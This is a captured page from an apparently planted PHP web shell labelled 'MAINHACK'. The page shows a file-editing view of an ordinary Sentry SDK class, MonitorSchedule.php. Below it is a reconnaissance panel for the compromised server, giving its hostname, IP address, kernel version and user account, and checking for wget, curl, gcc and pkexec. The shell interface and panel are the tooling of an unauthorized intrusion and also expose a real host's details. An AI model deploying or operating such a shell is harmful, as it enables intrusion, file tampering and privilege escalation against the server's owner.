[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: MonitorSchedule.php
<?php declare(strict_types=1); namespace Sentry; final class MonitorSchedule { /** * @var string The type of the schedule */ private $type; /** * @var string|int The value of the schedule */ private $value; /** * @var MonitorScheduleUnit|null The unit of the schedule */ private $unit; public const TYPE_CRONTAB = 'crontab'; public const TYPE_INTERVAL = 'interval'; /** * @param string $type The type of the schedule * @param string|int $value The value of the schedule * @param MonitorScheduleUnit|null $unit The unit of the schedule */ public function __construct( string $type, $value, ?MonitorScheduleUnit $unit = null ) { $this->type = $type; $this->value = $value; $this->unit = $unit; } public static function crontab(string $value): self { return new self(self::TYPE_CRONTAB, $value); } public static function interval(int $value, MonitorScheduleUnit $unit): self { return new self(self::TYPE_INTERVAL, $value, $unit); } public function getType(): string { return $this->type; } public function setType(string $type): self { $this->type = $type; return $this; } /** * @return string|int */ public function getValue() { return $this->value; } /** * @param string|int $value */ public function setValue($value): self { $this->value = $value; return $this; } public function getUnit(): ?MonitorScheduleUnit { return $this->unit; } public function setUnit(?MonitorScheduleUnit $unit): self { $this->unit = $unit; return $this; } /** * @return array<string, string|int> */ public function toArray(): array { return [ 'type' => $this->type, 'value' => $this->value, 'unit' => (string) $this->unit, ]; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.8 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002